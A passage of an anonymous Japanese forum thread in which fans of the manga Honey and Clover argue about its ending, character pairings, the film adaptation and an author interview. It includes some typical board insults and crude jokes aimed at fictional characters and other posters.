で、うろたえながらも野宮を悪く言う真山に回し蹴り一発でも喰らわせて
「何よ、今まで好きでもないのに散々思わせぶりな態度取っちゃって!真山のバカ!」
「・・・でも、今まで優しくしてくれてありがとう、嬉しかったよ」
くらいは言わせて欲しかった。

584 :花と名無しさん:2006/08/11(金) 17:17:48 ID:???0
初期の山田には共感できたけど、途中からウンザリした。
恋愛が絡まない時は好きなんだけど。
合コンで酔っぱらって真山のことを愚痴る場面
あんな山田は見たくなかったよ・・・。


585 :花と名無しさん:2006/08/11(金) 17:55:22 ID:???0
山田の服がフリフリになっていったのは、はぐちゃんの影響なのか?
キャラが乙女になっていくのは飲み屋とかに翻弄されるから
自然の流れだと思ったけど。1巻とかすごいシンプルな服だし

586 :花と名無しさん:2006/08/11(金) 17:59:13 ID:???0
野宮山田としたらすぐ飽きそう。
山田は今度は野宮に粘着しそう。

587 :花と名無しさん:2006/08/11(金) 18:06:28 ID:???O
確かに野宮は山田がなびいたらすぐに飽きそう
落とす過程を楽しむタイプっぽいし

588 :花と名無しさん:2006/08/11(金) 18:31:12 ID:???O
今まで追われてたから追うのが楽しいんだろうな野宮は。
そうじゃなかったら色々キツイと思う。

589 :花と名無しさん:2006/08/11(金) 18:38:54 ID:???0
できたらそういう狩人根性は卒業して落ち着いて欲しいけど
山田がその終着点だと今まで野宮に捨てられた女がなんか可哀相だな

590 :花と名無しさん:2006/08/11(金) 18:57:49 ID:???0
初期の鉄人モードな山田なら根性も生活力もありそうな良いおかんになると思うが
gdgd乙女モードな山田だったら確かにダメそうだよな

591 :花と名無しさん:2006/08/11(金) 19:14:37 ID:???0
真山を吹っ切ったら鉄人復活するといいね

592 :花と名無しさん:2006/08/11(金) 19:30:15 ID:???0
>>583 つまんない

593 :花と名無しさん:2006/08/11(金) 21:38:29 ID:???0
野宮「山田さんも最近締りが悪くなってきたな・・・・・そろそろ次の恋さがすかな?」

594 :花と名無しさん:2006/08/11(金) 21:57:52 ID:???0
山田は毎日スクワット100回やってるから締りは抜群ですよ。
でもマラソン選手とかみたいに鍛えすぎると、絞まりすぎて
帝王切開しないと赤ちゃん産めない身体になるから要注意ね。

595 :花と名無しさん:2006/08/11(金) 22:09:25 ID:???0
スクワットはひざによくないお

596 :花と名無しさん:2006/08/11(金) 23:21:00 ID:???0
5人で並んでる絵のときって
絶対真山と山田、はぐと森田が隣にならんような気がしてる。

597 :花と名無しさん:2006/08/11(金) 23:37:54 ID:???0
最終回が代役なんて・・・

598 :花と名無しさん:2006/08/11(金) 23:40:08 ID:???O
たけのこ………

599 :背の高いブ男:2006/08/11(金) 23:40:55 ID:VqseYsPK0
たけのこ?


600 :花と名無しさん:2006/08/11(金) 23:41:29 ID:???0
竹本オタ、たけのこたけのこキモイんですけど・・・・

601 :花と名無しさん:2006/08/11(金) 23:46:59 ID:???O
森田ヲタ、竹本に異常に拒絶反応示しててキモいんですけど‥‥

602 :花と名無しさん:2006/08/11(金) 23:49:56 ID:???O
どっちかっつーと森田オタがたけのことか竹田とか言って
馬鹿にしてんだろw

603 :花と名無しさん:2006/08/11(金) 23:58:37 ID:???0
携帯臭だもんわかってしまう

604 :花と名無しさん:2006/08/11(金) 23:58:38 ID:???O
森田オタの八つ当り他キャラ叩き
竹本→ダメ男、空気、森田を貶しやがって!!
はぐ→森田を振った自己中カバ女死ね
修→森田のお株を奪ったロリ変態じじい死ね
野宮→やりチン、すぐ山田に飽きそうw(森はぐが成立
しなかったので他カップル成立が気に食わないためいちゃもんつける
山田、真山、リカ叩きも同じく

605 :花と名無しさん:2006/08/12(土) 00:02:23 ID:???0
>>604
それらはぜんぶ自分が一番やってるでしょ

606 :花と名無しさん:2006/08/12(土) 00:03:32 ID:???0
そうか、この名物人間は竹本ヲタだったか。

607 :花と名無しさん:2006/08/12(土) 00:56:11 ID:???0
もしかして携帯から書いてること
バレてないと思ってる?

608 :花と名無しさん:2006/08/12(土) 01:05:49 ID:???0
こんなに分かりやすい自演は久々だ

609 :花と名無しさん:2006/08/12(土) 01:10:18 ID:???O
本当にふがいないや…

610 :花と名無しさん:2006/08/12(土) 01:13:28 ID:???0
真山は飲み屋&山田をとっくに認めているでしょ。
飲み屋と山田が観覧車に乗ったって話聞いた時点で。
なんで真山は山田を手元におきたがってるって話になってるの?

611 :花と名無しさん:2006/08/12(土) 01:15:29 ID:???0
竹本も森田も両方好きな人間から見ればホント訳わからん。
真山の山田へのねじれた友情について全面否定してる人に関してもわからん。

612 :花と名無しさん:2006/08/12(土) 01:17:59 ID:???0
携帯とPCの書き込みは識別できるってことを知らない奴いるのかw

613 :花と名無しさん:2006/08/12(土) 01:26:55 ID:???O
>>620
手元に置くつっても言葉通りの意味じゃなくて…

614 :花と名無しさん:2006/08/12(土) 01:35:39 ID:???0
真山の場合、手元に置く=恋愛感情としてではなくて
いなくなった竹本と森田の役割を残された山田一人に求めているというか。
だから「恋人はそっちでどうにかしてくれ。でも俺を見捨てないでくれ」ってところだろう。


ある意味野宮や山崎にもそれを求めそうだが。

615 :花と名無しさん:2006/08/12(土) 02:07:16 ID:???O
言葉通りじゃなくて、恋人にはなれないけど気持ちは消えて欲しくないみたいな、少々欲張りというかこ狡い感じかな?

616 :花と名無しさん:2006/08/12(土) 02:14:46 ID:???0
>いなくなった竹本と森田の役割を残された山田一人に求めているというか。

こんな描写最終回にあったっけ?

617 :花と名無しさん:2006/08/12(土) 02:35:23 ID:???0
>>620に期待

618 :花と名無しさん:2006/08/12(土) 14:14:44 ID:???O
つーかスネオのスプリット良くね?

619 :花と名無しさん:2006/08/12(土) 14:19:54 ID:???0
基本的にはワルツの方が好きなんだけど
「それぞれの道をゆく・・・」部分からサビにかけての流れは
スプリットの方がいいなあ

620 :花と名無しさん:2006/08/12(土) 14:24:31 ID:???0
え?今の話って最終回のみのことなの?

621 :花と名無しさん:2006/08/12(土) 14:42:57 ID:???0
>>620
お前にはガッカリ

622 :花と名無しさん:2006/08/12(土) 14:59:23 ID:???0
>>621
いや今北産業だから前のレスは自分じゃないよ
でも読んでて噛み合ってない感じがしたから聞いたのさ

623 :花と名無しさん:2006/08/12(土) 15:07:17 ID:???0
>>622
噛み合ってないのはもまえだ

624 :花と名無しさん:2006/08/12(土) 15:11:49 ID:???0
ま、今北だからしかたあるまいよ

625 :花と名無しさん:2006/08/12(土) 15:15:41 ID:???0
今北相手に咬みつくなよw

626 :花と名無しさん:2006/08/12(土) 15:17:42 ID:???0
関係ないけど今北産業って少女漫画板でも使われてんの?
VIPくらいしか使わないと思ってた
普通に今来たんだけどって言えばいいのに

627 :花と名無しさん:2006/08/12(土) 15:20:25 ID:???0
今北産業って基本的にニュー速や祭り関係でよく見るんだが

「今来たばかりだから3行で状況を説明してくれ」ってことじゃなかったっけ

628 :花と名無しさん:2006/08/12(土) 15:25:33 ID:???0
10巻が出る前にアニメが終了しそうだね

629 :花と名無しさん:2006/08/12(土) 15:32:16 ID:???0
今北って別にどこでも使ってるんじゃないの?
あちこちで見るよ。
産業の意味は
もともと627の言う通りだと思うけど。

630 :花と名無しさん:2006/08/12(土) 15:47:12 ID:???0
しかし随分人減ったよね
あの修はぐ祭りが懐かしい
マターリ語れるからいいけどさ

631 :花と名無しさん:2006/08/12(土) 16:13:42 ID:???0
ほんとにみんな興味無くなったんだろうな。

632 :花と名無しさん:2006/08/12(土) 16:32:02 ID:???0
やっと読んだんだが、結構良い終わり方だな
続きそうだけど…って感じで希望もあって、俺好みだ

ところでスピンオフって何なんだ?

633 :花と名無しさん:2006/08/12(土) 16:47:51 ID:???0
どこかで最終回は考えてあるって読んだ気がするけど
サンドイッチがやりたかったのか…

634 :花と名無しさん:2006/08/12(土) 16:57:57 ID:???O
ttp://s.pic.to/4sucf

真山はうまくねえな

635 :花と名無しさん:2006/08/12(土) 18:04:43 ID:???0
竹本佑太は絶対にこの世にいない方が良い。
人の金や物を羨んだり、自分より力の弱い女を狙ってハァハァしたり、
挙句の果てには花も買えない情けない男のくせに自分の物にしようとする…
こんなんで生きる価値があると思うか?
竹本のような人に害を撒き散らす有害なゴミクズは絶対に消滅すべき。


636 :花と名無しさん:2006/08/12(土) 18:45:15 ID:???O
>>90
元凶ここだったのかよ…
死ね
自分探し云々と政治家が言ってたーなんてー奴を
鵜呑みにしてわざわざ相手してやるアホがいたから
他スレでまで馬鹿を図に乗らせてんだよ
ふざけんな
他スレの迷惑考えろ、あらすじ読んだらただの素人マンガじゃねーか
自分探しなんかしてないただのニートな奴ばっかだろうに
まともに構ってやって
さらにこんなマンガを読み続けて
そのせいで糞作品&キャラを流行らせた奴等は、
馬鹿なメディア展開ばかりの集英社ごと消えろ

637 :花と名無しさん:2006/08/12(土) 19:16:37 ID:???0
日本語でおk

638 :花と名無しさん:2006/08/12(土) 19:22:37 ID:???0
日本語でおk

639 :花と名無しさん:2006/08/12(土) 19:35:17 ID:???0
日本人じゃない人に「日本語でおK」と言っても無理ポですよw

640 :花と名無しさん:2006/08/12(土) 20:07:33 ID:???0
最近、改行カ所からして絶対に縦読みなのに、どこを読めばイイかまったくわからない
って書き込み多い。たとえば>>636

641 :花と名無しさん:2006/08/12(土) 20:55:03 ID:???0
635は真山の間違いなんじゃとオモタw

642 :花と名無しさん:2006/08/12(土) 20:57:32 ID:???0
nihongode ok

643 :花と名無しさん:2006/08/12(土) 20:59:54 ID:???0
犯罪者指数は真山>竹本だけど
さすがに>>635は違うとオモ

644 :花と名無しさん:2006/08/12(土) 21:00:39 ID:???0
>>641
ググってみた。
>>635の元ネタがわかった。
http://www.google.com/search?num=50&lr=lang_ja&q=%E3%81%AF%E7%B5%B6%E5%AF%BE%E3%81%AB%E3%81%93%E3%81%AE%E4%B8%96%E3%81%AB%E3%81%84%E3%81%AA%E3%81%84%E6%96%B9%E3%81%8C%E8%89%AF%E3%81%84
「竹」しか合ってないのにコピペ改変された竹本裕太カワイソスww
ttp://www.s-woman.net/hachikuro/interview/09/01.html

645 :花と名無しさん:2006/08/12(土) 21:12:58 ID:???0
竹本は一回御祓いしてもらったほうがいい
かわいそうすぎる

646 :花と名無しさん:2006/08/12(土) 21:15:44 ID:???0
>>628

最終話12話は9月14日放送
ttp://hachikuro.net/cgi-bin/index.cgi
コミック10巻は9月8日発売
ttp://comics-news.shueisha.co.jp/common/shinkan/index2.html

647 :花と名無しさん:2006/08/12(土) 22:49:07 ID:???0
うえあっ 商売の香り…

648 :花と名無しさん:2006/08/12(土) 22:51:26 ID:???0
もう続きはないの?

649 :花と名無しさん:2006/08/12(土) 23:57:03 ID:???O
ウミノたん書き直して!

650 :花と名無しさん:2006/08/13(日) 00:21:39 ID:???0
心配しなくても番外編は出ますよ

651 :花と名無しさん:2006/08/13(日) 00:57:08 ID:???0
羽海野のお気に入りキャラだけの番外編がな

652 :花と名無しさん:2006/08/13(日) 01:48:48 ID:???0
終わったな

653 :花と名無しさん:2006/08/13(日) 02:37:58 ID:???0
番外編が読みたいキャラっている?
自分は特にいないんだよね
なんか最終回読んで終わったなって脱力してる感じ

654 :花と名無しさん:2006/08/13(日) 03:03:07 ID:???0
自分は倉持君の話が読みたいかも

655 :花と名無しさん:2006/08/13(日) 04:04:05 ID:???0
最終刊なら「空の小鳥」収録されるかな。
何年待ったことか・・・
こんなつまらん終わり方するために何年も収録拒否してきたのかと思うと腹が立つ。

ちなみに「空の小鳥」はヤングユーにハチクロが連載を始める前に載った読みきり短編です。


656 :花と名無しさん:2006/08/13(日) 04:23:35 ID:???O
ハチクロは人間がガキだし汚いからやだね
NANAもガキだが人間がさっぱりしてていいよな

657 :花と名無しさん:2006/08/13(日) 05:59:37 ID:???O
森田のバイトって何なんですか?
森田とかおるの関係は?

658 :花と名無しさん:2006/08/13(日) 06:02:21 ID:???O
はぐの天才さがいまいちわからん

659 :花と名無しさん:2006/08/13(日) 09:14:55 ID:???O
漫画のキャラクターの顔 毎回コロコロ変わるな
山田 はぐ 花本 あたり

660 :花と名無しさん:2006/08/13(日) 10:44:01 ID:???0
ラフや落書き.スケッチ.原画集が1/3程度つくと予想

661 :花と名無しさん:2006/08/13(日) 10:45:53 ID:???O
1行以内で不満を述べよ。

662 :花と名無しさん:2006/08/13(日) 11:04:27 ID:???0
竹本が哀れすぎ。

663 :花と名無しさん:2006/08/13(日) 11:07:08 ID:???0
後半のストーリー展開が早すぎて不自然。

664 :花と名無しさん:2006/08/13(日) 11:36:44 ID:???O
最初と最後だけ竹本が主人公の漫画。

665 :花と名無しさん:2006/08/13(日) 11:45:56 ID:???O
真山容疑者に時間使いすぎ

666 :花と名無しさん :2006/08/13(日) 11:47:00 ID:???0
オタ臭きもい

667 :花と名無しさん:2006/08/13(日) 11:48:35 ID:???O
美大漫画なら予備校時代をぜひ( ・∀・)っ旦~

668 :花と名無しさん:2006/08/13(日) 11:57:18 ID:???O
662、663
確かにその感は否めない。
どんな展開だったらみんな納得だったんでしょうね…。


669 :花と名無しさん:2006/08/13(日) 12:08:19 ID:???0
前半と後半の差がすごいよね

670 :花と名無しさん:2006/08/13(日) 12:13:55 ID:???O
>>660
幽々白書の最終巻を思い出した

671 :花と名無しさん:2006/08/13(日) 12:33:41 ID:???0
>>668
はぐと竹本が結ばれてハッピーエンド。

672 :花と名無しさん:2006/08/13(日) 12:40:01 ID:???O
森田のバイトは?

673 :花と名無しさん:2006/08/13(日) 12:40:03 ID:???0
>>671
りぼんならそれが王道なんだろうなと思うが・・・

>>668
全員 き ち ん と 自 立 した上での巣立ちエンド

674 :花と名無しさん:2006/08/13(日) 12:40:44 ID:???0
はぐが自立して終わればよかった

675 :花と名無しさん:2006/08/13(日) 12:48:41 ID:8xP5oEKsO
はぐが皆殺しエンドがよくね?

676 :花と名無しさん:2006/08/13(日) 14:23:26 ID:???0
生身の人間のオブジェを作りたくなったはぐが、たけのこを海に誘い出して・・・

677 :花と名無しさん:2006/08/13(日) 14:29:53 ID:???0
はぐの肉喰いの設定が生きてくるな

678 :花と名無しさん:2006/08/13(日) 14:37:55 ID:???O
あの終わりかた以外ならなんでもいい

679 :花と名無しさん:2006/08/13(日) 15:45:48 ID:???0
修はぐ以外なら割と素直に受け入れてたと思う

680 :花と名無しさん:2006/08/13(日) 16:02:39 ID:IX6WtgE7O
国際展示場駅にあったハチクロのポスター、
山田とはぐの顏がまったく同じでキモかった…


681 :花と名無しさん:2006/08/13(日) 17:13:45 ID:???0
>>676
>>677
おそろしすぎる・・・
修とかはぐに頼まれたら躊躇せず竹本を殺しそうだ
そして従容として死に行く竹本
これぞ真の悲劇

682 :花と名無しさん:2006/08/13(日) 17:47:03 ID:???O
アニメ
8話『...僕はなにも知らなかった。』
9話『...ああ、神様..どうか、彼女を...』
10話『...どこ行っちゃてるのよ、ばか...』
11話『...私から、絵を描くことを奪わないでください...』


なんかタイトル微妙ね 10話 山田か?なんか違和感

683 :花と名無しさん:2006/08/13(日) 18:00:33 ID:???O
竹本が精神崩壊後、
はぐ殺って終わればよかったんだよ

684 :花と名無しさん:2006/08/13(日) 18:08:45 ID:wbBhShibO
森田愛

685 :花と名無しさん:2006/08/13(日) 18:09:27 ID:???O
いいかげん、はぐ叩きうざいしキモい

686 :花と名無しさん:2006/08/13(日) 18:19:54 ID:???O
森田を選んでくれればよかったのに 恐ろしいはぐ

687 :花と名無しさん:2006/08/13(日) 18:23:16 ID:???0
途中まで竹本と結ばれるといいなと思ってたけど
読んでるうちに森田と幸せになれって思えたのに
なんか知らんが修と結ばれてしまったはぐ…

作者が意図する方向に素直に読んでたつもりなんだけどな

688 :花と名無しさん:2006/08/13(日) 18:24:12 ID:???0
>>685
キモイのはおまえだろwww
たかが漫画にどんだけ感情移入してるんだよwww
夏休みですか、ボク?

689 :花と名無しさん:2006/08/13(日) 18:25:38 ID:???0
森田とはぐはうまく行ってほしかったけど、
結ばれない可能性の方が強いって思ってたな。
竹本とはないと思ってたけど。
やはり、それぞれが旅立ってほしかったかも。

690 :花と名無しさん:2006/08/13(日) 18:53:33 ID:???0
読んだのこのスレだけなんだけど
おまいらウミノの絵に関してはどうよ

人体の動きなんかは上手いとは思うが
表情がダメすぎやしないか?

自分は線の雑さが気になっていまいち入りこめず


691 :花と名無しさん:2006/08/13(日) 19:02:18 ID:???0
漫画より映画のほうがよかった
あれだとはぐと森田を好きになれる
というか映画って森田とはぐのお話

692 :花と名無しさん:2006/08/13(日) 19:15:57 ID:???0
>>691 そうなの?映画ってマンガしか読んでなくても
素直に入り込める??見に行こうかな??

693 :花と名無しさん:2006/08/13(日) 19:17:38 ID:???0
>>690
線、雑だよねぇ。
でも自分は「young you」には汚い線のマンガが多いと思ってたから
少しおかしいのかも。

694 :花と名無しさん:2006/08/13(日) 19:24:31 ID:???O
>>688
いや>>685の言うとおり化と

695 :花と名無しさん:2006/08/13(日) 20:02:16 ID:???0
>>687
うーん…あの終わり方だと修はぐ確定とは言えなくない?
はぐは今でも森田のほうが好きなんだし。
いずれ森田がはぐをかっさらいに来ると予想してる。

696 :花と名無しさん:2006/08/13(日) 20:09:07 ID:???0
批判したい人はアンチスレに行けばいいじゃん。


697 :690:2006/08/13(日) 20:14:32 ID:???0
>>696
スマソ
アンチでない人ってどう思うのかなーと思って
スレちがいだったな

漏れは逝くよ

698 :花と名無しさん:2006/08/13(日) 20:19:55 ID:???0
>>695
それ、最終回後よく出てくる予想で
それに希望を見出した人もいるみたいだけど
そうなったらなったでひどい話だと思う・・
ここで修はぐにした意味が全くないし。

699 :花と名無しさん:2006/08/13(日) 20:23:26 ID:???0
アンチスレは、このスレの住民批判やファンヲチの人もいるからね
「いちおうはファンだけど、gdgd展開の批判をしたい」という人は
お呼びじゃない感じだよ。

700 :花と名無しさん:2006/08/13(日) 20:24:38 ID:???0
>>698
作者が日和ってるから一貫性が無いよな
何がしたいんだ状態

701 :花と名無しさん:2006/08/13(日) 20:56:58 ID:???0
竹本って結局美大に行ってまで清貧暮らしの宮大工の道に進むの?

702 :花と名無しさん:2006/08/13(日) 20:58:52 ID:???O
清貧?宮大工ってすごく儲かると聞いたんだが。

703 :花と名無しさん:2006/08/13(日) 21:12:16 ID:???0
>>701
実際あの給料は「未経験で使い物にもならないけどとりあえずお情けで雇っていた」からじゃないか?
誰でも出来るような雑用と飯炊きしかやっていなさそうだったし。

本格的にあの道に進むのならばもう少しまっとうな給料になるんじゃないかと思う。

704 :花と名無しさん:2006/08/13(日) 21:36:13 ID:???O
>>685
本当に叩かれるよりもネタキャラ扱いはまだいいよ

705 :花と名無しさん:2006/08/13(日) 21:53:04 ID:RvdjaY4X0
>>704
だってたけのこが一撃かましたじゃん。
はぐが(嫌々)返すものじゃない
(女)は臭自身がみつけるものだと。

>>707
美大卒なら変じゃないだろ。
美術系の職に付かない人間多いし
クリエイティブな仕事となったらマジで一握りだ。

706 :花と名無しさん:2006/08/13(日) 22:10:47 ID:???0
知人の父が宮大工だが、結構金持ちっぽいよ

707 :花と名無しさん:2006/08/13(日) 22:17:57 ID:???O
タコ本のセリフもはぐロボのセリフも
せめてものフォローなのか なんなのやら・・・・・・
タコ『返さなくていいとおもうよ 』→『利用できるもんは利用しなきゃ!真面目が馬鹿を見るんだよこの世界。俺はわかったんだ』
ロボ『ありがとう・・・グスン』→『だよね・・・言ってもいないのに自分から全てくれるって言ってんだもね・・・・ありがたく全て使わなきゃね。損だよね。無理して返さなくていいよね』
2人は確実に成長してるとおもうよ

修『2人はグルだったんだ・・・・俺は裏切られた』→精神崩壊→復讐者に

708 :花と名無しさん:2006/08/13(日) 22:30:19 ID:???0
つまんない

709 :花と名無しさん:2006/08/13(日) 22:32:30 ID:???0
>>497
「なにもしない」でファイナルアンサー。

以下ソース↓

>以前、ロッキングオンJAPAN編集部にいたときに、
>僕は『ハチミツとクローバー』の作者の羽海野チカさんにインタヴューをしたことがあり、
>その時に印象的だった話がふたつあります。
(中略)
>そして、もうひとつはコミック第5巻のあるシーンについての話。
>花本先生が山田に「『努力する』か『諦める』か。人間に選べる道なんて
>たいていこのどっちかしかないよ」とアドバイスしたあと、
>心のなかで「ほんとうは、選択肢は3つあったんだ」とつぶやく―――
>彼がマンガの中では口にしない、
>そのもうひとつの選択肢とは「なにもしない」であり、
>花本先生もそれを選んだ人なのだと、羽海野さんは解説してくれました。

「 H 」VOL.86 2006年8月号(特集『ハチミツとクローバー』)より 編集後記(抄) 
ttp://www.amazon.co.jp/gp/product/B000GYI606/sr=1-7/qid=1155475428/ref=sr_1_7/250-3292008-0485862?ie=UTF8&s=books

頻出の質問だし、次回からテンプレに追加ね。

710 :花と名無しさん:2006/08/13(日) 23:19:19 ID:7D/CJx/40
>>712
職人は大抵そう。
問題は本当に一人前になるまでちゃんと勤まるか。
下っ端は安い。逆に使えるようになると貴重なので重宝される。

711 :花と名無しさん:2006/08/14(月) 02:40:10 ID:???0
9巻ではぐの親は修にどんなこと言ってたの?
分かる人教えてください。

712 :花と名無しさん:2006/08/14(月) 02:45:55 ID:???O
修復師や宮大工って給料安いの?

713 :花と名無しさん :2006/08/14(月) 03:24:09 ID:???0
>>712
GJ!

714 :花と名無しさん:2006/08/14(月) 04:20:17 ID:???0
>>712
見習いはものすごく給料が安くて
ベテランになったら給料は高くなる

少し前のレスも読めないのか、携帯厨は。
ドコモみたいな糞な携帯使ってるのかな。

715 :花と名無しさん :2006/08/14(月) 04:53:04 ID:???0
>>714
>>712は気遣いの出来る人。
>>710のアンカー先見れ。おまいさんこそちゃんと
流れ嫁。


716 :花と名無しさん:2006/08/14(月) 07:40:59 ID:???O
キャー>>714タンてばハズカチー

717 :花と名無しさん:2006/08/14(月) 07:54:11 ID:???0
修は毎日ハチクロサンド食べれるんだよね(´・ω・`)

718 :花と名無しさん:2006/08/14(月) 08:05:49 ID:???0
>>712
どう来るかと思ってたが、よくやった!

719 :花と名無しさん:2006/08/14(月) 08:22:50 ID:???0
>>715
スマン。
710の未来レスにあわせて712は質問をわざわざ書いたのか。

720 :花と名無しさん:2006/08/14(月) 10:45:02 ID:???0
>>711
父「はぐみ…!」
は「お父さん」
修「お久しぶりです」
手はどうだ?痛むのか?今は麻酔が利いてて、
神経は繋がってあとはリハビリ云々というような会話。
父「リハビリの事だが…」
修「それは任せて下さい。○○(父の名)さんには何も迷惑はかけませんから。」
父「…いやしかし、それでは修司君に迷惑が」
修「あなたの元に帰って100%リハビリに向き合えますか?身篭っている奥さんだっているのに。」
父「……」
は「お父さん、わたしなら大丈夫。お父さんは生まれてくる赤ちゃんと○○(嫁の名)さんの事だけを考えてあげて。」
修「はぐが東京に居る間の事はぼくの責任です。はぐの右手は僕が必ず治します。」
父「…すまない。はぐみ、頑張るんだぞ。修司君、はぐをよろしく頼む。」
病室入り口で chapter59回想シーンのコマ
父「入院費や生活費は全て私が払う。遠慮なく言ってくれ。」
修「大丈夫ですよ。何も迷惑はかけないと言ったはずです。」
父「しかし…、」
修「新築した家のローンと奥さんのお母さんの面倒を見て、そのうえ
  はぐの治療費まで負担できるんですか?ぼくは独りだし蓄えもある。
  何より金だけ出して面倒は見ないってんじゃ虫がよすぎですよ。」
父「…その通りだ。申し訳ない。」

別に金はもらえばいいじゃんと思ったが辻褄を合わせるとこんな感じでは。
嫁は病室に居たが気まずくて言葉少なめで、帰り際ソファに座ってるのは
「少し修司君と話があるから待っていなさい。」とでも言われたのか、または
はぐ父がいらぬ気を遣って最初からそのへんに座らせて待たせたんじゃないかと。

家のローンとか妄想だし、人生下さい言う前にこの時点で修に完全に依存してる矛盾とか、
そういうの全部ひっくるめてハチクロって素敵ですよね。

721 :花と名無しさん:2006/08/14(月) 10:51:15 ID:???0
×蓄えがある
○金蔓(森田)がいる

722 :花と名無しさん:2006/08/14(月) 10:52:44 ID:???0
ほんとフツーに金だけもらえばいいよなー
だいたい、なんでそんなに修が責任負うんだか
自分が怪我させたわけでもないんだし
父も「俺が払う 遠慮なく言ってくれ」
ってお前の娘だろが
これで娘溺愛父ってものっすごい変
このシーンだけでも何もかもがすごくおかしいな

723 :花と名無しさん:2006/08/14(月) 11:57:01 ID:???0
はぐの父ってはぐのためになにもしてないね。
小さい頃からほとんど修が面倒見て、今もこうして一緒に住んでて。
もう普通に修が父設定でよかったんじゃ?
関係今でも十分おかしいし。近親相姦もかわらんよ。

724 :花と名無しさん:2006/08/14(月) 13:00:57 ID:???0
結局最後まで幸せになれたキャラは少なかったね…。

はぐは結局怪我で甘ったれに逆戻りだし、修は実質(趣味と実益を兼ねているとはいえ)面倒見役。
森田は才能のせいで大学での自分の居場所を無くして、山田は真山の呪縛に囚われたまんま。
竹本については言わずもがな。
脇役の野宮もリカも山崎ですらも本当に一番好きな人と最高に幸せになる事はできなかった。

725 :花と名無しさん:2006/08/14(月) 13:23:36 ID:???0
>>3の「映画では、はぐは姪」って書いてあるけど
昨日見てきたらちゃんと「イトコの娘」って言ってたよ。
誰が書いたの?これ。

726 :花と名無しさん:2006/08/14(月) 13:29:08 ID:???0
>>725
そうなの?
でも映画の公式サイト見たら姪って書いてあるよ

727 :花と名無しさん:2006/08/14(月) 13:42:25 ID:???0
映画では修とはぐがどんな続柄でも問題ないってことだな、きっと。

728 :花と名無しさん:2006/08/14(月) 14:07:30 ID:???0
>>726
うん。はぐを皆に紹介するところで
二回「俺のいとこの娘」って言ってたよ。
このスレで姪って見てたから、最初自分の聞き間違いかと思ったけど
やっぱり「いとこの娘」って言ってた。私の耳がおかしくなかったらw

729 :花と名無しさん:2006/08/14(月) 14:16:23 ID:???0
公式サイトの関係図はパンフに載ってるやつだ。

映画スタッフとパンフ作ったスタッフとで
設定が行き違ってるのかな?ただの誤植かも。
まぁ映画ではただの見守る親戚だったしどっちでもいいよね。

730 :花と名無しさん:2006/08/14(月) 15:21:46 ID:???O
竹本 幸せな結末じゃん
就職できたんだから

731 :花と名無しさん:2006/08/14(月) 15:36:15 ID:???0
山田だって幸せじゃん。
いつまでも一人の人を想い続けて終了したんだから

732 :花と名無しさん:2006/08/14(月) 16:34:54 ID:???0
>>731
体は別の男に捧げるがな。

733 :花と名無しさん:2006/08/14(月) 17:34:13 ID:???0
森田だって幸せじゃん。
好きな仲間と仕事できていつかアイツに会うその日まで
精一杯頑張るんだから

なにげに臭が一番つらいかもw
タケノコの起死回生の一手ではぐの心は飛んでったし
最大のライバル森田は奪回に向けて虎視眈々。


734 :花と名無しさん:2006/08/14(月) 17:34:21 ID:???0
私も竹本は幸せだと思うよ。
成長したしやりたい事見つかったし。
好きな人と結ばれることだけが幸せではないと思う。

735 :花と名無しさん:2006/08/14(月) 17:40:09 ID:???0
>>725-729
思ったんだが、いとこって親が兄弟ってことだから
自分らも兄弟みたいなもんだから
姪と言おうがいとこの子と言おうがなんら変わりはないと思う


736 :花と名無しさん:2006/08/14(月) 17:45:17 ID:???0
>>735
法律的には大きな差がある
それにしてもいとこと兄弟が同じ様なものというのは大雑把が過ぎないか」?

737 :花と名無しさん:2006/08/14(月) 17:54:46 ID:???0
結婚できるかできないかは大きいよ
モラル面での恋愛していい人としてはいけない人って境界線を
いとこの娘なら越えられるし
もし姪設定ならさすがにほとんどの人が祝福しない

738 :花と名無しさん:2006/08/14(月) 17:55:27 ID:???0
>>737
祝福しないのは作中の人物がってことね

739 :花と名無しさん:2006/08/14(月) 17:55:27 ID:???0
>>735
変わるけど似たようなものでもある。
活字にしてしまえば違うとしかいいようがない。

740 :花と名無しさん:2006/08/14(月) 18:07:40 ID:???0
本誌の展開がああなった以上大きな違いだよね
普通に森はぐ辺りで収まるような展開な何でも良かったけど

741 :花と名無しさん:2006/08/14(月) 19:23:32 ID:???0
>>736
なるほど
大雑把と言うより、伯母さんと仲がいい設定とかに憧れがあるのです

>>740
コミック8巻まで読みました

742 :花と名無しさん:2006/08/14(月) 20:04:26 ID:???0
>>741
そこで止めとく方がいい

743 :花と名無しさん:2006/08/14(月) 22:03:18 ID:???0
漫画の帯の絵って想像でみんなと海に行った絵だよね。・゚・(*ノД`*)・゚・。



744 :花と名無しさん:2006/08/14(月) 22:37:13 ID:???O
YUKIのFC会報に対談あり。
コーラス7月号発売直後だったらしく、連載後半のシリアス部分についても語ってる。

745 :花と名無しさん:2006/08/14(月) 22:53:43 ID:???0
何語ってんのさ。
森田王子のいかにも貴種流離譚的なシリアスなんて
今更なくても良かった気がしてるけど。

746 :花と名無しさん:2006/08/14(月) 23:22:59 ID:???0
作品だけで語れよ

747 :花と名無しさん:2006/08/14(月) 23:37:34 ID:???O
新聞紙1面分の対談なので、長文スマソ。

・森田派や竹派から困惑の 電話殺到。「署名集めた ら結末は変わるのか?」 との質問も。
・ハチクロは修の物語でもある 。「傍観者」だと思おう としていたが、みんなと 同じになって飛び込む事 で、大好きだー、と言え る様になった。
・はぐの話は最初から決ま ってた。すごくつらい話 になるから、読者もつら くなるだろうと思い、も のすごい勢いで飛ばして 描いた。
・はぐの話を進める上で森 田の生い立ちは避けて通 れず、どうしようもなく すれ違う二人を描きたか った。
・はぐの様に道を決めた子 は読者から共感されにく いが、モノを作ってる人 には分かってもらえる  といいなと思って描いて いた。
・YUKIと平野(アニメのOPのデ ィレクター)「辛い時に傍にい る人に頼ってしまうのは 共感できる」との話を聞 いて、海羽野「次号(多 分ラスト)描くべき事が分か った」と。

748 :花と名無しさん:2006/08/14(月) 23:42:52 ID:???0
>はぐの話は最初から決まってた。
>すごくつらい話になるから、読者もつらくなるだろうと思い、
>ものすごい勢いで飛ばして描いた。

話を端折って描いたって事?それとも勢いよく描いたって事?
どちらにしてもはぐサイドも丁寧に描くべきだったと思うよ…


749 :花と名無しさん:2006/08/14(月) 23:45:56 ID:???0
正直読みづらいので>>747を書き直す

・森田派や竹派から困惑の電話殺到。
「署名集めたら結末は変わるのか?」との質問も。

・ハチクロは修の物語でもある。
「傍観者」だと思おうとしていたが、みんなと同じになって飛び込む事で、
大好きだー、と言える様になった。
